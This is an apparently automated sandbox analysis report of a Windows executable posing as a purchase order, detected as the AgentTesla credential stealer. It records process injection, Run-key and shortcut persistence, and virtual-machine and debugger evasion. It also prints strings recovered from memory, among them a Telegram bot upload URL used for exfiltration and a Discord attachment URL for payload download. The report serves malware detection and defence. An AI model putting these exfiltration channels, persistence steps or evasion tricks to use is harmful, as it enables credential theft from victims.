
Analysis Report New Order PO20011046.exe

Overview

General Information

Sample Name: New Order PO20011046.exe
Analysis ID: 324078
MD5: 310a7ca550b9997d0e0bcaf645530303
SHA1: 5617d1e233381ea3fd6ab796fcc6a2de66137c51
SHA256: 0ee90c988386390753a1954692a658e393d761887ecfbfd100105c365a3ebc34
Tags: ESPexegeo


Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Writes to foreign memory regions
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • New Order PO20011046.exe (PID: 7048 cmdline: 'C:\Users\user\Desktop\New Order PO20011046.exe' MD5: 310A7CA550B9997D0E0BCAF645530303)
    • svchost.exe (PID: 6700 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • cmd.exe (PID: 6960 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4476 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • New Order PO20011046.exe (PID: 1256 cmdline: C:\Users\user\Desktop\New Order PO20011046.exe MD5: 310A7CA550B9997D0E0BCAF645530303)
  • Evvudrv.exe (PID: 5488 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe' MD5: 310A7CA550B9997D0E0BCAF645530303)
  • Evvudrv.exe (PID: 4868 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe' MD5: 310A7CA550B9997D0E0BCAF645530303)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\uvvE.url
Rule: Methodology_Shortcut_HotKey
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x9b:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]

Source: C:\Users\user\AppData\Local\uvvE.url
Rule: Methodology_Contains_Shortcut_OtherURIhandlers
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Source: C:\Users\user\AppData\Local\uvvE.url
Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x70:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source: 0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security

Unpacked PEs

Source: 11.2.New Order PO20011046.exe.4a80000.1.raw.unpack; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 11.2.New Order PO20011046.exe.4b40000.2.unpack; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 11.2.New Order PO20011046.exe.4b40000.2.raw.unpack; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 11.2.New Order PO20011046.exe.4a80000.1.unpack; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New Order PO20011046.exe' , ParentImage: C:\Users\user\Desktop\New Order PO20011046.exe, ParentProcessId: 7048, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 6700
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New Order PO20011046.exe' , ParentImage: C:\Users\user\Desktop\New Order PO20011046.exe, ParentProcessId: 7048, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 6700

Signature Overview



AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe; ReversingLabs: Detection: 68%
Multi AV Scanner detection for submitted file
Source: New Order PO20011046.exe; Virustotal: Detection: 32%
Source: New Order PO20011046.exe; ReversingLabs: Detection: 68%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: New Order PO20011046.exe; Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 5_2_504851E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 4x nop then mov eax, dword ptr [00460BCCh]
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 4x nop then mov eax, ecx
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe; Code function: 4x nop then mov eax, dword ptr [00460BCCh]
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe; Code function: 4x nop then mov eax, ecx
Source: Joe Sandbox View; IP Address: 162.159.136.232
Source: Joe Sandbox View; IP Address: 162.159.130.233
Source: Joe Sandbox View; JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: unknown; DNS traffic detected: queries for: discord.com
Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp; String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp; String found in binary or memory: http://DynDns.comDynDNS
Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp; String found in binary or memory: http://hltGXE.com
Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp; String found in binary or memory: https://api.ipify.orgGETMozilla/5.0
Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp; String found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
Source: Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmp; String found in binary or memory: https://cdn.discordapp.com/attachments/781759014248775694/781759240837791774/Evvured
Source: Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmp; String found in binary or memory: https://discord.com/
Source: Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmp; String found in binary or memory: https://discord.com/J
Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp; String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown; Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown; Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49755 -> 443

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample; Static PE information: Filename: New Order PO20011046.exe
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_020DB9BA NtQuerySystemInformation,
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_020DB97F NtQuerySystemInformation,
Source: C:\Users\user\Desktop\New Order PO20011046.exe; File created: C:\Windows\assembly\Desktop.ini
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_02BDA4F4
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00406C50
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00402860
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_0041A47E
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00408C10
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00418C8C
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00401650
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00418204
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00402ED0
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00402B40
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00418748
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00407350
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00402F39
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_0040DBD1
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00407BEF
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00419384
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe; Code function: 16_3_02D1A4F4
Source: C:\Windows\SysWOW64\svchost.exe; Code function: String function: 50484278 appears 51 times
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: String function: 0040E198 appears 44 times
Source: New Order PO20011046.exe; Static PE information: invalid certificate
Source: New Order PO20011046.exe; Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: New Order PO20011046.exe; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Evvudrv.exe.0.dr; Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Evvudrv.exe.0.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: New Order PO20011046.exe, 0000000B.00000001.758964598.0000000000448000.00000040.00020000.sdmp; Binary or memory string: OriginalFilenameuszkpYZrHmwlxpeBdJLqZbZT.exe4 vs New Order PO20011046.exe
Source: New Order PO20011046.exe, 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp; Binary or memory string: OriginalFilename_.dll4 vs New Order PO20011046.exe
Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs New Order PO20011046.exe
Source: New Order PO20011046.exe, 0000000B.00000002.922240026.0000000005300000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenamewbemdisp.tlbj% vs New Order PO20011046.exe
Source: C:\Users\user\AppData\Local\uvvE.url, type: DROPPED; Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\uvvE.url, type: DROPPED; Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\uvvE.url, type: DROPPED; Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: classification engine; Classification label: mal100.troj.evad.winEXE@15/7@6/4
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_020DA9DA AdjustTokenPrivileges,
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_020DA9A3 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 5_2_5048789A GetDiskFreeSpaceA,
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,
Source: C:\Users\user\Desktop\New Order PO20011046.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_01
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\svchost.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\Desktop\New Order PO20011046.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe; File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\New Order PO20011046.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: New Order PO20011046.exe; Virustotal: Detection: 32%
Source: New Order PO20011046.exe; ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\New Order PO20011046.exe; File read: C:\Users\user\Desktop\New Order PO20011046.exe
Source: unknown; Process created: C:\Users\user\Desktop\New Order PO20011046.exe 'C:\Users\user\Desktop\New Order PO20011046.exe'
Source: unknown; Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: unknown; Process created: C:\Users\user\Desktop\New Order PO20011046.exe C:\Users\user\Desktop\New Order PO20011046.exe
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
Source: unknown; Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Process created: C:\Users\user\Desktop\New Order PO20011046.exe C:\Users\user\Desktop\New Order PO20011046.exe
Source: C:\Windows\SysWOW64\svchost.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
Source: C:\Windows\SysWOW64\svchost.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
Source: C:\Windows\SysWOW64\svchost.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\New Order PO20011046.exe; File written: C:\Windows\assembly\Desktop.ini
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: New Order PO20011046.exe; Static file information: File size 1311424 > 1048576
Source: C:\Users\user\Desktop\New Order PO20011046.exe; File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: Binary string: _.pdb source: New Order PO20011046.exe, 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Unpacked PE file: 11.2.New Order PO20011046.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Unpacked PE file: 11.2.New Order PO20011046.exe.400000.0.unpack
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237C137 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237D536 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237943F push edi; ret
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237B338 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237C724 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_02379C23 push ebx; ret
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_02379E14 push ebx; ret
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237C81F push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237D61B push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237D207 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237D607 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237997C push ebx; ret
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237B178 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237926C push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_02379A6C push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237D153 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237D24E push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237B0B3 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237A7B0 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237C1A9 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237A392 push edi; iretd
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237949D push ebx; ret
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237C49C push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237B287 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237C2FC push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237B5E4 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237C4EF push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_02379EE9 push ebx; ret
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237C5D6 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_0237C3C2 push esi; retf
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Code function: 0_3_02BD1AA4 push 00440316h; ret
Source: C:\Users\user\Desktop\New Order PO20011046.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe
Source: C:\Users\user\Desktop\New Order PO20011046.exe; Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Evvu
Source: C:\Users\user\Desktop\New Order PO20011046.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\New Order PO20011046.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Source: C:\Users\user\Desktop\New Order PO20011046.exe Function Chain: systemQueried,systemQueried,threadDelayed,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\New Order PO20011046.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\New Order PO20011046.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\SysWOW64\svchost.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\New Order PO20011046.exe Code function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\New Order PO20011046.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe TID: 6660 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 5992 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 6916 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332 Thread sleep count: 138 > 30
Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332 Thread sleep time: -4140000s >= -30000s
Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332 Thread sleep time: -507620s >= -30000s
Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332 Thread sleep time: -776334s >= -30000s
Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332 Thread sleep time: -388583s >= -30000s
Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332 Thread sleep time: -388778s >= -30000s
Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332 Thread sleep time: -209349s >= -30000s
Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332 Thread sleep time: -89670s >= -30000s
Source: C:\Users\user\Desktop\New Order PO20011046.exe TID: 6332 Thread sleep time: -59688s >= -30000s
Source: C:\Users\user\Desktop\New Order PO20011046.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\New Order PO20011046.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
